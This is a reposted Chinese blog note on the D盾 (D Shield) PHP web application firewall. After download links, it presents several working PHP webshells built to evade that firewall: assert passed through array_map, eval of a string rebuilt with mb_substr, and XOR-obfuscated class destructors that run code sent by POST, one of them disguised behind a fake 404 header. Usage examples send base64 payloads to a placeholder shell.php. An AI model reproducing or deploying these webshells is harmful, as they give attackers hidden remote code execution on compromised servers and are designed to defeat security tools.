应用安全-安全设备-Waf系列-软Waf-D盾

安装

下载
http://www.d99net.net/down/d_safe_2.1.5.2.zip

使用说明

http://www.d99net.net/News.asp?id=106

免杀

array_map |  assert

<?php 
function test($a, $b)
{
    array_map($a, $b);
}
test(assert, array($_POST['x']));
?> 

mb_substr

<?php
$m=$_GET['1'];
$a=mb_substr($m,0,1); 
$b=mb_substr($m,1,9999);
eval($a.$b);
?>

PHP一句话

class LTDS
{
    public function __destruct()
    {
        $bxo='X'^"\x39";
        $woa='?'^"\x4c";
        $ukt='K'^"\x38";
        $gud='d'^"\x1";
        $fbu='_'^"\x2d";
        $agx='<'^"\x48";
        $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx;
        return @$HLWV($this->OX);
    }
}
$ltds=new LTDS();
@$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8'];

http://www.xxx.com/shell.php  
POST: ua8=phpinfo();  //与普通shell相同
http://www.xxx.com/shell.php?id=xxx(xxxx随意更改)
POST: ua8=cGhwaW5mbygpOwo=  //payload的base64编码

异或 | PHP一句话

<?php 
header('HTTP/1.1 404');
class ZXVG
{
    public $c='';
    public function __destruct()
    {
        $_0='&'^"\x47";
        $_1='C'^"\x30";
        $_2='A'^"\x32";
        $_3='v'^"\x13";
        $_4='J'^"\x38";
        $_5='f'^"\x12";
        $db=$_0.$_1.$_2.$_3.$_4.$_5;
        return @$db($this->c);
    }
}
$zxvg=new ZXVG();
@$zxvg->c=$_POST['mr6'];

 

转载于:https://www.cnblogs.com/AtesetEnginner/p/11356491.html

  • 0
    点赞
  • 0
    评论
  • 1
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

表情包
插入表情
评论将由博主筛选后显示,对所有人可见 | 还能输入1000个字符
相关推荐
©️2020 CSDN 皮肤主题: 编程工作室 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值